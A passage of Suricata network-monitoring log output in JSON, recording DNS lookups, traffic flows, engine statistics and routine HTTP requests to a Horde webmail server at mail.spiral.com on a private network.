eudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2730,"synack":2721,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1757,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2250,"failed_udp":110},"tx":{"http":4546,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2327}},"flow_mgr":{"closed_pruned":2694,"new_pruned":15,"est_pruned":2297,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20506,"memcap_state":0,"memcap_global":0},"http":{"memuse":2192,"memcap":0}}} {"timestamp":"2020-02-29T00:07:29.000493+0000","flow_id":1061177603184026,"event_type":"flow","src_ip":"192.168.10.122","src_port":56168,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":2,"bytes_toserver":172,"bytes_toclient":282,"start":"2020-02-29T00:02:28.578970+0000","end":"2020-02-29T00:02:28.812490+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:30.133597+0000","flow_id":2246425387862493,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49223,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":27477,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:30.242241+0000","flow_id":2246425387862493,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49223,"proto":"UDP","dns":{"type":"answer","id":27477,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:30.242241+0000","flow_id":2246425387862493,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49223,"proto":"UDP","dns":{"type":"answer","id":27477,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:30.268255+0000","flow_id":1337983970224512,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52698,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:07:30.268255+0000","flow_id":1337983970224512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52698,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":16,"tx_id":0}} {"timestamp":"2020-02-29T00:07:32.000140+0000","flow_id":893085479963979,"event_type":"flow","src_ip":"192.168.10.130","src_port":34744,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":18,"pkts_toclient":28,"bytes_toserver":3250,"bytes_toclient":28563,"start":"2020-02-29T00:05:29.625995+0000","end":"2020-02-29T00:06:30.686607+0000","age":61,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:07:32.000396+0000","flow_id":263627957994143,"event_type":"flow","src_ip":"192.168.10.130","src_port":34746,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":6,"bytes_toserver":1276,"bytes_toclient":956,"start":"2020-02-29T00:05:30.656031+0000","end":"2020-02-29T00:06:30.686645+0000","age":60,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:07:34.388868+0000","flow_id":1337983970224512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52698,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:07:34.399804+0000","flow_id":23852826892732,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":43605,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":49607,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:34.508268+0000","flow_id":23852826892732,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43605,"proto":"UDP","dns":{"type":"answer","id":49607,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:34.508268+0000","flow_id":23852826892732,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43605,"proto":"UDP","dns":{"type":"answer","id":49607,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:34.638156+0000","flow_id":1337983970224512,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52698,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:07:34.638156+0000","flow_id":1337983970224512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52698,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":199,"tx_id":1}} {"timestamp":"2020-02-29T00:07:34.656889+0000","flow_id":746339340518905,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54527,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":33582,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:34.764835+0000","flow_id":746339340518905,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54527,"proto":"UDP","dns":{"type":"answer","id":33582,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:34.764835+0000","flow_id":746339340518905,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54527,"proto":"UDP","dns":{"type":"answer","id":33582,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:34.862566+0000","flow_id":1337983970224512,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52698,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5486}} {"timestamp":"2020-02-29T00:07:35.000218+0000","event_type":"stats","stats":{"uptime":14107,"capture":{"kernel_packets":133828,"kernel_drops":0},"decoder":{"pkts":133831,"bytes":92550250,"invalid":183,"ipv4":132372,"ipv6":8,"ethernet":133831,"raw":0,"null":0,"sll":0,"tcp":127240,"udp":4934,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2715,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2731,"synack":2722,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1758,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2251,"failed_udp":110},"tx":{"http":4547,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2328}},"flow_mgr":{"closed_pruned":2696,"new_pruned":15,"est_pruned":2298,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21166,"memcap_state":0,"memcap_global":0},"http":{"memuse":53880,"memcap":0}}} {"timestamp":"2020-02-29T00:07:35.005162+0000","flow_id":17002334350197,"event_type":"flow","src_ip":"192.168.10.122","src_port":35837,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:33.551797+0000","end":"2020-02-29T00:02:33.658408+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:39.863240+0000","flow_id":1337983970224512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52698,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5486},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":27327,"tx_id":2}} {"timestamp":"2020-02-29T00:07:40.000714+0000","flow_id":1521357579846265,"event_type":"flow","src_ip":"192.168.10.122","src_port":39579,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:39.033401+0000","end":"2020-02-29T00:02:39.144484+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:42.000516+0000","flow_id":926165322136906,"event_type":"flow","src_ip":"192.168.10.81","src_port":52692,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":10,"bytes_toserver":1219,"bytes_toclient":8809,"start":"2020-02-29T00:06:31.425290+0000","end":"2020-02-29T00:06:41.624893+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:07:42.000731+0000","flow_id":384282168206084,"event_type":"flow","src_ip":"192.168.10.122","src_port":42164,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:41.140036+0000","end":"2020-02-29T00:02:41.244983+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:43.000189+0000","event_type":"stats","stats":{"uptime":14115,"capture":{"kernel_packets":133852,"kernel_drops":0},"decoder":{"pkts":133853,"bytes":92559420,"invalid":183,"ipv4":132392,"ipv6":8,"ethernet":133853,"raw":0,"null":0,"sll":0,"tcp":127256,"udp":4938,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2715,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2731,"synack":2722,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1758,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2253,"failed_udp":110},"tx":{"http":4549,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2330}},"flow_mgr":{"closed_pruned":2696,"new_pruned":15,"est_pruned":2300,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20173,"memcap_state":0,"memcap_global":0},"http":{"memuse":2032,"memcap":0}}} {"timestamp":"2020-02-29T00:07:43.001397+0000","flow_id":542306914958372,"event_type":"flow","src_ip":"192.168.10.130","src_port":34748,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1095,"bytes_toclient":725,"start":"2020-02-29T00:06:30.687140+0000","end":"2020-02-29T00:06:42.570839+0000","age":12,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:07:43.818348+0000","flow_id":2246425387862493,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49223,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":31542,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":1}} {"timestamp":"2020-02-29T00:07:43.926789+0000","flow_id":2246425387862493,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49223,"proto":"UDP","dns":{"type":"answer","id":31542,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:43.926789+0000","flow_id":2246425387862493,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49223,"proto":"UDP","dns":{"type":"answer","id":31542,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:44.000900+0000","flow_id":1825376840178270,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"158.69.60.196","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:02:43.449118+0000","end":"2020-02-29T00:02:43.556107+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:44.089851+0000","flow_id":2004988097150431,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34760,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=E4CyMdGf1_ahUkbupqNOwDc&view=Contact","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6933}} {"timestamp":"2020-02-29T00:07:46.417076+0000","flow_id":360397875076404,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46500,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":63556,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:46.525040+0000","flow_id":360397875076404,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46500,"proto":"UDP","dns":{"type":"answer","id":63556,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:46.525040+0000","flow_id":360397875076404,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46500,"proto":"UDP","dns":{"type":"answer","id":63556,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:46.658213+0000","flow_id":642560046543245,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34762,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6136}} {"timestamp":"2020-02-29T00:07:47.000342+0000","flow_id":28091940766251,"event_type":"flow","src_ip":"192.168.10.122","src_port":43799,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:46.754219+0000","end":"2020-02-29T00:02:46.861282+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:47.001038+0000","flow_id":2218946168519686,"event_type":"flow","src_ip":"192.168.10.122","src_port":33488,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:46.228358+0000","end":"2020-02-29T00:02:46.339559+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:48.000525+0000","flow_id":1874300828193260,"event_type":"flow","src_ip":"192.168.10.81","src_port":52694,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":8,"bytes_toserver":1013,"bytes_toclient":6180,"start":"2020-02-29T00:06:41.856556+0000","end":"2020-02-29T00:06:47.067758+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:07:48.000794+0000","flow_id":206771170309255,"event_type":"flow","src_ip":"192.168.10.122","src_port":39566,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:47.390279+0000","end":"2020-02-29T00:02:47.501100+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:48.000908+0000","flow_id":406165026970995,"event_type":"flow","src_ip":"192.168.10.122","src_port":33988,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:47.204147+0000","end":"2020-02-29T00:02:47.309811+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:48.000998+0000","flow_id":979672010002716,"event_type":"flow","src_ip":"192.168.10.122","src_port":36753,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:47.528668+0000","end":"2020-02-29T00:02:47.634105+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:48.966645+0000","flow_id":2004988097150431,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34760,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=E4CyMdGf1_ahUkbupqNOwDc&view=Contact","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6933},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":35877,"tx_id":0}} {"timestamp":"2020-02-29T00:07:48.976304+0000","flow_id":1914802374239664,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51696,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":47241,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:49.000515+0000","flow_id":2186244303009272,"event_type":"flow","src_ip":"192.168.10.130","src_port":34750,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":10,"bytes_toserver":1225,"bytes_toclient":7931,"start":"2020-02-29T00:06:42.570872+0000","end":"2020-02-29T00:06:48.567753+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:07:49.084348+0000","flow_id":1914802374239664,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51696,"proto":"UDP","dns":{"type":"answer","id":47241,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:49.084348+0000","flow_id":1914802374239664,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51696,"proto":"UDP","dns":{"type":"answer","id":47241,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:49.166484+0000","flow_id":2004988097150431,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34760,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7998}} {"timestamp":"2020-02-29T00:07:50.000246+0000","event_type":"stats","stats":{"uptime":14122,"capture":{"kernel_packets":133873,"kernel_drops":0},"decoder":{"pkts":133891,"bytes":92577100,"invalid":183,"ipv4":132430,"ipv6":8,"ethernet":133891,"raw":0,"null":0,"sll":0,"tcp":127290,"udp":4942,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10002,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094464},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2717,"ssn_memcap_drop":0,"pseudo":341,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2733,"synack":2724,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1760,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2254,"failed_udp":110},"tx":{"http":4551,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2332}},"flow_mgr":{"closed_pruned":2698,"new_pruned":15,"est_pruned":2304,"bypassed_pruned":0,"flows_checked":8,"flows_notimeout":6,"flows_timeout":2,"flows_timeout_inuse":0,"flows_removed":2,"rows_checked":65536,"rows_skipped":65528,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19181,"memcap_state":0,"memcap_global":0},"http":{"memuse":105545,"memcap":0}}} 